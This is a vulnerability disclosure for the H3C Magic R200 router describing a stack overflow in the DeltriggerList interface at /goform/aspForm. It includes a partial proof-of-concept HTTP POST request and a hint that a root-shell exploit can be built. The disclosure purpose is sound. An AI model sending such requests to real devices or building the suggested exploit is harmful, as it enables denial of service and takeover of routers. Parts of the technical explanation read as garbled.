# H3C Magic R200 was discovered stack overflow via the DeltriggerList interface at /goform/aspForm
###### tags: `H3C` `Magic R200`
author:Wolin Zhuang, Yifeng Li;
## Vulnerability Description
H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
## Vulnerability Details
In function DeltriggerList,the size of local variable v7 is noly 16 bytes long.Parameters in the DeltriggerList interface use the getElement function to split strings(Var) and get items.
In line 28, the maximum size in the getElement function is limited to 64. When the length of input less than 64, the string will be copied into a1 by memcpy function. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability.
## Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
1. Upgrade router Magic_R200 to newest version(we have a physical machine)
2. Login to 192.168.124.1 as admin
3. Attack with the following POC
POST /goform/aspForm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service.
And you can write your own exp to get the root shell.